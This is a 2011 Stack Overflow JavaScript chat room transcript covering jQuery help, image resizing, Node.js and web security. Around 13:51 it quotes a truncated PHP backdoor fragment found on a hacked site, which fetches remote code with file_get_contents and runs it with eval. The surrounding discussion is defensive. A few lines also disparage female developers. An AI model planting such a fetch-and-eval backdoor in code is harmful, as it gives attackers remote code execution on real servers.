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09:09
hi there..
09:32
RT @ariyahidayat: 14x faster Jasmine tests with #PhantomJS by @danielrheath on @webdirections http://t.co/BVt39qS #in
09:44
“newton.js: box2d + Raphael” lightning presentation @webdirections from @DmitryBaranovsk http://t.co/BfkcP6o
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A: Most elegant way to define private "class" functions in Spine

RaynosNo. "private" functions don't exist. You only have local functions and closure state. And using local functions/variables and closures for state does not mix well with using prototypical inheritance. The real question you should be asking is "why do you need private functions" because you don't...

Why do we need private again?
you here Ranos?
@WojciechKlimkiewicz @Raynos hi
¬_¬
It's a trap Raynos!
Don't respond :o
Thats what Im thinking
10:18
@david do you have any idea how to change label name on selection of option button
in html
I aint no death star but i AM fully operational
I'd use javascript, add a change event handler to the option, and modify the text in there. Although it's possible you could pull it off with fancy css selectors
just stick to jquery I'd say
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Q: Why editing javascript in Chrome Developer Tools does not work?

RajishI have Google Chrome 13.0.782.220 on my Ubuntu 10.04 LTS (64-bit). I try to edit a JavaScript code in the Chrome Developer Tools Scripts pane by double-clicking on the script area. No matter how fast I click the only effect is to select a nearby word. Does anybody have an idea why the edit mode ...

10:27
@david dude i am new so pls clarify what r u saying
@SunnyRock are you using jquery?
@david don't have any idea about jquery and javascript
you don't have any javascript on the paeg?
@david yeah
@david i which is best for me javascript or jquery
jquery is a javascript library
it makes certain things easier
10:30
@david dude pls continue
@David So true
...
do you have an example of what you want to do? why you want to do it?
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Come back when you've read the good parts
You shouldn't be bloody touching any javascript without knowing what your doing
calm down :p
10:32
Why is that?
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Dont code dump
Good morning JavaScript!
Read it. Understand it. And stop doing it.
Good Night Greg!
@Raynos stop doing what
@MrJD no u
10:33
oh god
what's going on in here?
@SunnyRock what part of don't code dump do you not understand?
hi greg!
No idea
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@Raynos Why not? its only small?
10:34
@david are you the same david that made the famous jsfiddle?
gist: 1213561, 2011-09-13 10:34:01Z
<form> 
<div class="cb_lnmlbl"><h3>Select a City</h3></div> 
<div class="wh_citycb"> 
<select size="1" > 
<option>Mumbai</option><option>Delhi</option><option>Lucknow</option><option>Indore</option><option>Bengaluru</option><option>Kolkata</option> 
</select> 
</div> 

<div class="wh_citylb"><label name="citynm">Mumbai</label> <label name="citydate"> May 10th</label></div> 

<div class="wh_temp"><p>Min. <label name="mintemp">30 C</label></p> 
<p>Max. <label name="maxtemp">28 C</label></p> 
<p>Avg. <label name="avgtemp">25 C</label> 
</div> 
<div class="wh_img"> 
<img src="images/sunny_weather.png"/> 


</div> 
<div class="wh_imglb"> 
<label name="wh_imglb"> Sunny</label> 
</div> 
If you really must code dump either use a gist, jsfiddle, pastebin or something similar
@david your famous o/
i noticed ><
Can I link my unanswered javascript question?
@yourfriendzak you can if you want to
was it you that posted it on reddit greg?
10:34
@Raynos thanks dude
@david yeah I forked it ages ago, I couldn't find the original
ahah, all good
I wouldn't normally do this but this issue is really frustrating me and I could use some help
many tweets about it too :o
@yourfriendzak go ahead ill take a look
10:35
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Q: Resizing and centering an img in an "overflow: hidden" div

yourfriendzakI want to create a javascript/jquery function which will resize an img (while maintaining aspect ratio) of any set dimensions so that it fills a parent div (that has overflow:hidden set) of any set dimensions without gaps. The image should resize to parent along whatever dimension (width or heigh...

yeah I noticed, well it is immense :D
something like 16K views on JSFiddle
nobody knows it was me though :( so no crazy cred
one guy found me on twitter and followed me :D
well, at least they don't think its me
I was scared I'd get shot down for stealing your credit
naahh
a couple of people assumed it was you, but i don't care
it already served its purpose
@david what jsfiddle?
10:37
well... it didn't have a purpose, but it did well anyway
link to your original fork, and I'll add the URL to a comment on mine, so future clickers can find you
doubled my salary, and i've now got a 'skilled worker' visa to live in silicon valley for the next 3 years
errr, don't worry about adding a comment
cos then i'll get confused with people adding revisions
aha ok..
it already went up by like 60 revisions when i first posted it
WOW (its sperm war)
10:39
Ah yes that one
yeah it really is :D
It was made famous alittle while back
ahhh. well its nice to finally talk to you. I think I forked it about a year ago and only knew the author was called "david"
@MrJD is my question worded understandably?
Thats really amazing, good work
10:39
@david wait what?
You have a new job with double your salary because of that html5 demo
yeah
Awesome o/
@yourfriendzak Im thinking about it, so you want to make a div resize to it's parent while keeping it's ratio?
@david Woah!
@MrJD no...I want to position and resize an img inside its parent div so that its centered in an optimal fashion
@Raynos just saw your starred comment, are you a .NET programmer?
10:41
i move to america at the end of this month
@Greg used to be
now I do node.js
Maybe use Jquery UI positioning?
@MrJD...I am using it...the question I have is about the math
@Raynos nice
@MrJD what is the correct formula to determine the position
10:43
@yourfriendzak Let me read it again
@Raynos I have avoided getting into node for a long time... it seems that its awesomeness would addict me and I'd be forged to use it in all my projects and I couldn't work out if that was a good or bad thing.
I've started using it, it's really quite cool
@Greg its a good thing
You should use it all your projects
@Raynos I've had the idea of getting into it for a while now...
In terms of speed, what does it benchmark like with php as a fastcgi module?
(That was not an invitation to flame PHP)
Its faster :\
of course its faster
10:45
@yourfriendzak okay i think your overcomplicating it. So your end goal is to resize a child to the {same height and width of the parent giving priority to aspect ratio}, and then change the positioning so that it is in the centre?
JS > PHP by about a factor of 10
node.js vs apache is an easy win
node.js vs nginx is hard to benchmark
@Greg What is node?
I'm using both :o
@MrJD exactly...the child is an img and the parent is a div
node for anything interactive, nginx for generic webserverness
10:46
node.js google it
and any loadbalancing i may need later
@Raynos I don't use apache with PHP. I've used lighttpd for a long time and it is very fast
@MrJD its a pretty straight forward math problem, but I haven't been able to figure out a solution
@Greg do you own benchmark then
node.js is async so it's probably faster
@Raynos so, without getting into a Java|ECMA Script argument, how does node code hold up for the future?
as in, with ES6 and so on
10:48
What do you mean?
@yourfriendzak okay we can avoid the math
Can you make that a proper question?
Yeah sorry
@yourfriendzak .... ill see if i can mock something up and then ill answer it
@MrJD are you using jquery?
10:49
@yourfriendzak yeah, is that okay?
@MrJD its more than ok, its prefered (I'm using it)
@Greg also probably best to ask in node.js
@yourfriendzak Im not much good at anything apart from Jquery and C#
@Raynos yeah ok I'll join there...
@MrJD thats ok...jQuery is good
10:53
@yourfriendzak Btw is there any reason your not using css?
@yourfriendzak what part of the math are you having trouble with?
getting the right width/height?
@david determining which dimension to resize (width OR height) and then positioning the opposing margin so that its centered in a clipping view
for the dimensions at least
@david let me try it out...
@yourfriendzak OH
10:58
@david remember the inner img needs to be adjusted LEFT or RIGHT, not just width/height
Why not if(width=>height){
$this.css({width:100%,height:auto})
}else{
$this.css({height:100%,width:auto})
}
and then .position(my:centre centre, at:centre centre)
@MrJD the img needs to be adjusted left or right (with margin-left/margin-right or position: relative; left: right:) not just width/height...If the img is sized to one dimension, the other dimension will be off
@MrJD thats why it needs to be nudged
@MrJD what is my:centre centre?
thats part of Jquery ui positioning
are you saying you want the image on the inside to be as large as the entire parent (including margin?)
so that your inner image would be cropped?
yes
the inner image will be cropped unless its exactly the dimensions of the parent div
so it needs to be positioned so that its centered along the cropped dimension!
well just use the .position widget to do that after you set the height/ width
11:10
looking at some plugins which might help...
@yourfriendzak Ill make it and then post it as an answer
@MrJD thanks!
11:40
@yourfriendzak still here?
12:27
Every time I see "Does anyone know how to tell if a girl likes you or not? I am getting mixed signals." starred on the side, I think "Yeah, they really do have a terrible API. No documentation, inconsistent interface, and a complete lack of meaningful error codes."
Hahaha
Hi, I am having some issues with the jquery tablesorter plugin?Can I post the question in here?
@Angeline Yep!
Although, there's really no guarantee any of us JavaScript snobs will know about a particular jQuery plugin
posted on September 13, 2011

Samsung will not buy MeeGo but instead focuses on bada. Meanwhile HTC confirms it is considering buying its own OS, but “won’t be rushed” — unlike certain other large Android vendors we could mention. Time to update last week’s overview. #15 is the first new one. Both Samsung and HTC remark that they need their own OS in the long term. The purpose of having a

While sorting, the entire table gets sorted, but not reflected in the same page. Only when I move to the next page, I could see the updated table entries. For example, if I have 1-100 records, when I sort it, It should display entries 100 -91 in the first page, but I get it as 10-1, wen I move to the next page, it is 90-81.
and then If I clcik page 1, it displays entries 100-91. Am I missing something?
12:35
Hmmm. Not sure. I don't suppose you have a live example?
hmm no.. I'll try posting it somewhere n give u the link..
Two easy places:
jsfiddle.net
jsbin.com
Okay Ryan. Thank you..
13:01
I've uploaded the content, but the script doesn't seem to work at all
Or I'm not sure if I have done it properly
@Angeline I think you still need to include the tablesorter and pagination plugins.
RT @annevk: Another DOM4 question: How many of you want Element.create()? http://t.co/NKMiRXE #curiouseditor
13:35
@RyanKinal I know you like to see hacker related things: stackoverflow.com/questions/7402301/…
@Incognito Wow.
@Incognito So... if I'm correct, this all happened due to an eval (PHP)?
@RyanKinal I've updated it to show a potential way they're using it. But, yeah.
@Incognito If you don't mind my asking, how did you come to that conclusion? I don't see anything in the question about .ini or eval.
(Side note: This kind of stuff makes me realize that I know very little about security)
13:51
@RyanKinal The code he links to has an eval($str), $str makes an HTTP request to the hacker's domain.
(And that scares the hell out o fme)
    $answergrhey11=file_get_contents($url.'?ua=.........;
..............
    {
      return eval($answergrhey11);
Right, but it's this that confuses me:
> Next, remove that damn eval from PHP.ini. If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.
php.ini has the option to disable eval.
Ah, gotcha
Makes sense now :-)
13:53
Security being hard scares me too, especially as we push forward with new technologies like Node.
If they don't attack the right talent they'll end up a laughing stock like PHP is.
Any idea how they injected this code in the first place?
Millions of ways, it's hard to tell without having the server. This is the "virus" part if you want to think about it that way, not the attack vector to get it there.
Which is why I said nuke the damn thing and hire and expert.
Right right. That's kinda what I figured.
Node isnt easy to break
Any recommended security reading?
13:55
@RyanKinal OWASP.
That's a good point
Node is starting to attract the wrong talent
@Raynos Sure, but breaking has nothing to do with making the code written in Node to be my prison byatch.
admittedly it's still not easy enough for the noobs like PHP is
Besides who's stupid enough to call eval ever
@Raynos No, but the real thing is nobody cares about security, nobody's proactive about it either, it's all reactive.
True.
I see that problem
13:57
@Raynos The website dev didn't have to, he just had to have code that permitted it somewhere.
That can be fixed easily though
There's ways they could accomplish the exploit without eval anyway, this was just the simplest method.
Ensure you run a validator and a sanitizer on all inputs
@Raynos Do you suggest we set fires all over the internet? :p.
Thats what I'll do if I write a serious website
13:58
@Raynos Doesn't matter, that's one minor vector.
@Incognito Part of that is the fact that security is hard. I've done some reading on preventing XSS, XHRF, and SQL injection, but I still don't feel comfortable writing user authentication with persistent login.
You can attack me in other ways then inputs
Theres always DOS'ing my server
And the other thing that's missed, you're pulling data from the DB, many people feel like it's safe, it's the perfect place for XSS.
but thats a different type of attack
bleh I have been the victim of Dos :?
13:59
yes it is.
@Incognito "Filter in, escape out"
But its only unsafe if you dont sanitize what goes into the db
really sucks because theres nothing you an do but try and find the incoming traffic and block it
and lock the db down
@Raynos You should never sanitize what goes into the DB.
13:59
Oh I see
If someone wants to store <xss>herp().derp()</xss> in your db, you let them.
raw data in the database, sanitize on the way out
You don't store \<xss\>herp().derp()\<\/xss\>
@Raynos Right, expect sanitize is such a stupid word, it gives the impression we're removing bad parts. We're transforming it to be safe in the output.
But even if your site's fine, the DB ports could be open, passwords might suck, people still don't get the unix security model, etc.
@Incognito So, OWASP is huge. Where to start?
If i'm going to one day use node like apache, and go sudo apt-get install apache2 or sudo apt-get install node it's devs need to make it secure out of the box.
@RyanKinal It's like wikipedia, anywhere you want to start learning.
14:03
I dont know what security vulnerabilities there are in the node HTTP engine
@Incognito I figure "top ten" isn't a bad place.
Huh. First thing I read, and I'm wondering how secure my company's site is:
> Beware of APIs, such as stored procedures, that appear parameterized, but may still allow injection under the hood.
@Raynos That terrifies me.
hello
@RyanKinal Think like a hacker. What can you do to totally screw someone over with any given thing?
i wanted to write a conditional statement in jquery to check if the user have hovered over the li
14:05
@PD24 Hi
@Incognito I dont know what security vulnerabilities there are in the apache HTTP engine
i have made a js fiddle
I dont know what a HTTP security vulnerability is
I dont know the methods of attack I dont know what needs to be gaurded againsts
@Raynos Apache has some fairly complex ones that can happen if you don't stay up with updates. Node is better suited to be more secure, but again, if it's not the right people, it's going to be tragic.
14:07
opens up Fiddler2, starts sending HTTP requests to his server
@RyanKinal Check out metasploit while you're at it.
:(
@PD24 Looking
Thank you, you are very kind. the js fiddle is added
@PD24 jqueryUI does that by default, why are you re-inventing the wheel? jqueryui.com/demos/accordion/#mouseover
14:14
@Incognito basically i am trying to then get my sub menu to fly out
the accordion example doesnt seem to work
@PD24 Wait....
PD24, click in the top menu where it says help, goto "about," does your browser say IE5.5?
ok so apparently there are tons of female devs in the gov or something..
just got another resume they are pushing..
@Loktar Governments like women. It makes them look like they don't have a bias when they have a lot of females in the HR equality report.
lol
firefox :P
14:17
@Incognito yeah great point
we already have one female dev though! lol
and she sucks :?
@Loktar At RBC they asked us "Do you consider yourself a visible minority?" exclusively for that reason.
lol nice
you see when i hover on the div it will work, but the sub items are not a div
accordion will only work for 1 level?
@PD24 Oh, you want a tree.
the first level is the div that they hover over.. it presents them with the sub options.. they then hover over those options for the items to fly out
kinda i guess
can i style the tree so it looks like a menu
@PD24 I don't know I haven't played with it. Did you want a menu?
yeah its a left menu
thats supposed to cascade at the first level, then when the user hovers on the sub item its supposed to fly out
what i produced in my js fiddle was a start
my js fiddle is this: jsfiddle.net/dttdB/1
14:45
Really strange javascript bug here me thinks:
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Q: Google Chart API going mental with my PNGs

Adam LynchWhat should look like this: IE8 without Google Chart API Looks like this: IE8 with Google Chart API The black is a 1 pixel squared black semi-transparent PNG repeated X & Y and the white is pretty much the same but white. Somehow gradients are introduced when the Google Chart API is li...

@AdamLynch I have seen that before. I don't remember what I did, though.
@Ryan but you didn't just stop using the API yeah?
@AdamLynch That's the other thing... I wasn't using the charts API. I think it had something to do with CSS opacity?
But I have seen IE do that with PNGs
@ryan I'll look into it. Although it does go stop when I remove all Google chart API references
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Q: Why does it look like Google Analytics is inserting a DOCTYPE under IE?

Iain HallamHere's a web site that is being used for experimentation with HTML5: http://www.grahamharper.net/ It's got the new doctype (just html), but opening the page in IE9 triggers IE7 standards mode, which disables all the new features. Removing just the script that calls Google Analytics and inserts ...

14:49
@AdamLynch Yeah, I saw that.
@Ryan I'm not using any CSS opacity rules. Unless you meant my PNG opacity
@AdamLynch No, I meant what I said. I have to wonder if there's something going on with opacity in the API (although, that doesn't seem very Google-ish)
@Ryan Yeah and why would it expect every PNG on the page
@AdamLynch Indeed
14:56
@Ryan F it, if IE... black background color, no background image
@AdamLynch Honestly, that sounds like something I might have done too :-D

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